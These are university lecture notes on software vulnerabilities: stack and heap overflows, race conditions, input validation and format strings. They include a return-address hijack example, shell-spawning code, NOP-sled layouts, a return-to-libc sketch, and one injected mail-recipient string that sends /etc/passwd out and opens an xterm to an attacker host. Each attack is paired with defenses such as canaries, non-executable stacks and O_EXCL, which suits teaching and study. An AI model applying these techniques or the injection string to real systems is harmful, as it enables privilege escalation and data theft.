Spring 2005, Syracuse University Lecture Notes for CIS/CSE 785: Computer Security Vulnerability Overview 1. 2. 3. 4. 5. 6. Stack buffer overflow Heap buffer overflow Race condition Input validation Format string Miscellaneous vulnerabilities (1) Stack Buffer Overflow Process Layout The figure below shows the memory layout of a Linux process. Code and data consists of the program's instructions and the initialized and uninitialized static and global data, respectively. Run-time heap is mainly used for dynamically memory allocation (e.g., using malloc/calloc). This stack is used whenever a function call is made. Wenliang Du Vulnerability: Page 1 of 12 2/16/2016 Spring 2005, Syracuse University Lecture Notes for CIS/CSE 785: Computer Security Stack Layout Grows from high address to low address (while buffer grows from low address to high address) Return address: address to be executed after the function returns Frame pointer (FP): is used to reference the local variables and the function parameters A code example and the corresponding stack layout. void function (int a, int b, int c) { char buffer1[5]; char buffer2[10]; } int main() { function(1,2,3); } Buffer Overflow Problem void function (char *str) { char buffer[16]; strcpy (buffer, str); } int main () { char *str = "I am greater than 16 bytes"; // length of str = 27 bytes function (str); } Wenliang Du Vulnerability: Page 2 of 12 2/16/2016 Spring 2005, Syracuse University Lecture Notes for CIS/CSE 785: Computer Security Buffer Overflow Attack How to conduct a successful buffer overflow attack? Injecting the attack code Change the flow of execution Change the the flow of execution (A simple example) We want to skip past the assignment to the printf call. Buffer1 + 12: will point to the return address (12 = 8 + 4, 4 is the size of FP) (*ret) +=8: 8 is the distance that needs to be skipped (obtained using a debugging tool). void function(int a, int b, int c) { char buffer1[5]; char buffer2[10]; int *ret; ret = buffer1 + 12; (*ret) += 8; } void main() { int x; x = 0; function(1,2,3); x = 1; printf("%d\n",x); } Wenliang Du Vulnerability: Page 3 of 12 2/16/2016 Spring 2005, Syracuse University Lecture Notes for CIS/CSE 785: Computer Security Cause the program to run an arbitrary code. Place the code in the buffer by overflowing a buffer. Overwrite the return address so it points back into the buffer. The following example: Assuming the stack starts at address 0xFF, and that S stands for the code we want to execute the stack would then look like this: bottom of memory <------ DDDDDDDDEEEEEEEEEEEE 89ABCDEF0123456789AB buffer EEEE CDEF sfp FFFF 0123 ret FFFF 4567 a FFFF 89AB b FFFF CDEF c top of memory [SSSSSSSSSSSSSSSSSSSS][SSSS][0xD8][0x01][0x02][0x03] ^ | |____________________________| top of stack bottom of stack What code to inject? In most cases we'll simply want the program to spawn a shell. From the shell we can then issue other commands as we wish. Shell code (in Alepha One’s example, the size of the code is only 45 bytes). #include stdio.h void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Difficulty of writing a shell code The address of the string “/bin/sh” is needed by the execve system call. How do we know this address? Put the string after a CALL instruction. When the CALL is made, the string’s address is now in stack (note that CALL can use relative address) Pop the address from the stack to a register. The code can use that register when referring to the address of the string. Therefore, when writing the shell code, we don’t need to know where the string is. Wenliang Du Vulnerability: Page 4 of 12 2/16/2016 Spring 2005, Syracuse University bottom of memory <------ Lecture Notes for CIS/CSE 785: Computer Security DDDDDDDDEEEEEEEEEEEE 89ABCDEF0123456789AB buffer EEEE CDEF sfp FFFF 0123 ret FFFF 4567 a FFFF 89AB b FFFF CDEF c top of memory [JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03] ^|^ ^| | |||_____________||____________| (1) (2) ||_____________|| |______________| (3) top of stack bottom of stack Where is the shell code? How to jump to it? We need to know the absolute address of the shell code. How to find it? Guess Stack usually starts at the same address. Stack is usually not very deep: most programs do not push more than a few hundred or a few thousand bytes into the stack at any one time. Therefore by knowing where the stack starts we can try to guess where the buffer we are trying to overflow will be. Using NOP to increase the chance. bottom of memory <------ DDDDDDDDEEEEEEEEEEEE 89ABCDEF0123456789AB buffer EEEE CDEF sfp FFFF 0123 ret FFFF 4567 a FFFF 89AB b FFFF CDEF c top of memory [NNNNNNNNNNNSSSSSSSSS][0xDE][0xDE][0xDE][0xDE][0xDE] ^ | |_____________________| top of stack bottom of stack Programs that could have buffer overflow problem gets, strcpy, strcat, sprintf, scanf These are safer: fgets, strncpy, strncat, snprintf. How to prevent buffer overflow? In-Class Discussion 1) 2) 3) 4) Let the stack grow from low address to high address, so the return address cannot be overwritten. Make the stack non-executable. Save the return address to another stack. Use hardware protection to protect return addresses. Wenliang Du Vulnerability: Page 5 of 12 2/16/2016 Spring 2005, Syracuse University Lecture Notes for CIS/CSE 785: Computer Security StackGuard Observation: one needs to overwrite the memory before the return address in order to overwrite the return address. In other words, it is difficult for attackers to only modify the return address without overwriting the stack memory in front of the return address. A canary word is placed next to the return address whenever a function is called. If the canary word has been altered when the function returns, then some attempt has been made on the overflow buffers. Stack Shield Copy the RET address in an unoverflowable location (the beginning of the DATA segment) on function prologs (on function beginnings) Check if the two values are different on function epilogs (before the function returns). Need to maintain a stack kind of structure for storing return addresses. Non-executable Stack There are a few occasions that require the stack to be executable: e.g. Linux signal handler. Non-executable stack is now implemented in Linux kernel (Openwall Project). Return-to-libc attack: alter the return address, but the control is directed to a C library function rather than to a shellcode. For example, system() is a library function. It can be used to execute an arbitrary program (e.g. system(“/bin/sh”)). In most of the systems, the location of the C library is fixed, which makes it easy to guess. The parameters of the library function must be put in the stack, i.e., when overwriting the buffer, we should construct the stack frame for the library function. Library functions are NOT stored in the stack. Randomization Approach For the return-to-libc attack: randomize the library location and makes it difficult to guess. Wenliang Du Vulnerability: Page 6 of 12 2/16/2016 Spring 2005, Syracuse University Lecture Notes for CIS/CSE 785: Computer Security (2) Heap Buffer Overflow Introduction of Heap/BSS Global variables Static variables. Dynamic allocated memory. Overwriting file pointers The (set-uid) program’s file pointer points to “/tmp/vulprog.tmp”. The program needs to write to this file during execution using the user’s inputs. If we can cause the file point to point to “/etc/shadow”, we can add a line to “/etc/shadow”. How to find the address of “/etc/shadow”? Pass the string as the argument to the vulprog program, this way the string “/etc/shadow” is stored in the memory. We now need to guess where it is. static char buf[BUFSIZE], *tmpfile; /* saved in the heap */ /* argv[1] is provided by the user */ tmpfile = "/tmp/vulprog.tmp"; gets(buf); /* let’s cause a buffer overflow here the value of tmpfile. */ …… Write to tmpfile to change …… 0x884080 “/tmp/vulprog.tmp” tmpfile: 0x884080 printf("\nafter: tmpfile = %s\n", tmpfile); buf[16] overflow After the buffer overflow 0x903040 “/etc/shadow” Wenliang Du Vulnerability: Page 7 of 12 2/16/2016 Spring 2005, Syracuse University Lecture Notes for CIS/CSE 785: Computer Security Function Pointer A function pointer (i.e., "int (*funcptr)(char *str)") allows a programmer to dynamically modify a function to be called. We can overwrite a function pointer by overwriting its address, so that when it's executed, it calls the function we point it to instead. int main(int argc, char **argv) { static char buf[BUFSIZE]; /* in heap */ static int (*funcptr)(const char *str); /* in heap */ … funcptr = (int (*)(const char *str))goodfunc; strncpy(buf, argv[1], strlen(argv[1])); /* We can cause buffer overflow here */ (void)(*funcptr)(argv[2]); return 0; } /* This is what funcptr would point to if we didn't overflow it */ int goodfunc(const char *str) { } Overwriting Function Points System() approach: system() function is a library function. Its address is usually fixed. Therefore, we just need to let funcptr point to the address of system() function (using the overflow). argv[] method: store the shellcode in an argument to the program. This causes the shellcode to be stored in the stack. Then we need to guess the address of the shellcode (just like what we did in the stack-buffer overflow). This method requires an executable stack. Heap method: store the shellcode in the heap (by using the overflow). Then we need to guess the address of the shellcode, and assign this estimated address to the function pointer. This method requires an executable heap (which is more likely than an executable stack). A case study The BSDI crontab heap-based overflow: Passing a long filename will overflow a static buffer. Above that buffer in memory, we have a pwd structure! This stores a user name, password, uid, gid, etc. By overwriting the uid/gid field of the pwd, we can modify the privileges that crond will run our crontab with (as soon as it tries to run our crontab). This script could then put out a suid root shell, because our script will be running with uid/gid 0. Wenliang Du Vulnerability: Page 8 of 12 2/16/2016 Spring 2005, Syracuse University Lecture Notes for CIS/CSE 785: Computer Security (3) Race Condition An example (a set-uid program) file = “/tmp/tempfile”; if (file does not exist){ create the file using open(O_CREAT); } else {fail} Why is it vulnerable? open(O_CREAT) directly opens a file if the file already exists. How to make the file non-existing during the check, but existing after the check? Race condiction. How to prevent this problem? Use open(O_CREAT | O_EXCL): open fails if the file exists. Use mkstemp(), which is basically a wrapper around open(O_CREAT | O_EXCL). Another Example (a set-uid program) if (!access(file, W_OK)) { f = fopen(file, "wb+"); /* the real UID has access right */ write_to_file(f); } else { fprintf(stderr, "Permission denied\n"); } Why is it vulnerable? The access call checks whether the real UID (or real GID) has permissions to acess a file, and returns 0 if it does. Usually used by set-uid programs. The window between the checking and using: Time-of-Check, Time-of-Use (TOCTOU). How to cause file to represent two different files for the access and fopen calls? Race condiction. How to solve the TOCTOU problem? What cause the problem? Non-atomic operation. Check-use-check-again approach: lstat(file) first, then fd=open(file), then fstat(fd), then compare the results of lstat with fstat. RaceGuard: if the a file does not exist, the subsequent open() should not be able to open this file. We can modify OS kernel to monitor the abnormal behavior. Wenliang Du Vulnerability: Page 9 of 12 2/16/2016 Spring 2005, Syracuse University Lecture Notes for CIS/CSE 785: Computer Security (4) Input Validation Input from Environment Variables (when writing a setuid program, be careful about environment variables) PATH LD_LIBRARY_PATH: dynamic library directories. Most modern C runtime libraries have fixed this problem by ignoring the LD_LIBRARY_PATH variable when the EUID is not equal to the UID or the EGID is not equal to the GID. LD_PRELOAD: Modern systems ignore LD_PRELOAD if the program is a setuid program. Invoking Other Programs Safely. What are the potential problems if a setuid program does system("ls"); system() calls a shell, passing in the program's environment. PATH environment variable. IFS is a list of characters that the shell treats as white space. It is used to separate a command line into arguments. $ export IFS="s" Then system("ls") will execute "l". What are the potential problems if a CGI script does // $Recipient contains email address provided by the user // using web forms. system("/bin/mail", $Recipient); $Recipient might contain special characters for the shell: (e.g. |, &, <, >) "attacker@hotmail.com < /etc/passwd; export DISPLAY=proxy.attacker.org:0; /usr/X11R6/bin/xterm&;" How to invoke a program safely? Avoid anything that invokes a shell. Instead of system(), stick with execve(): execve() does not invoke shell, system() does. Avoid execlp(file, ...) and execvp(file,...), they exhibit shell-like semantics. They use the contents of that file as standard input to the shell if the file is not valid executable object file. Be wary of functions that may be implemented using a shell. Perl's open() function can run commands, and usually does so through a shell. Wenliang Du Vulnerability: Page 10 of 12 2/16/2016 Spring 2005, Syracuse University Lecture Notes for CIS/CSE 785: Computer Security Case Studies vi vulnerability Behavior: (1) vi file (2) hang up without saving it (3) vi invokes expreserve, which saves buffer in protected area (4) expreserve invokes mail to send a mail to user Facts: expreserve is a setuid program, and mail is called with root privilege. expreserve uses system("mail user") or system("/bin/mail user"); expreserve does not take care of the environment variables. Attack: Change PATH, IFS IFS="/binal\t\n" causes "m" be invoked, instead of "/bin/mail" Wenliang Du Vulnerability: Page 11 of 12 2/16/2016 Spring 2005, Syracuse University Lecture Notes for CIS/CSE 785: Computer Security (5) Format String Vulnerability (6) Miscellaneous Vulnerabilities Wrong Assumption About Environment A sendmail vulnerability Change the owner of /var/mail/userid to userid How to exploit it (to read other people’s email, to take over other people’s account)? Randomness lpr randomly generate a name for temporary file, then create the file in /tmp directory without checking whether the file exists. The randomness is bad, and numbers repeat themselves after 1000 runs. Screendump Devices also need to be protected Screen Speaker Microphone Keyboard Wenliang Du Vulnerability: Page 12 of 12 2/16/2016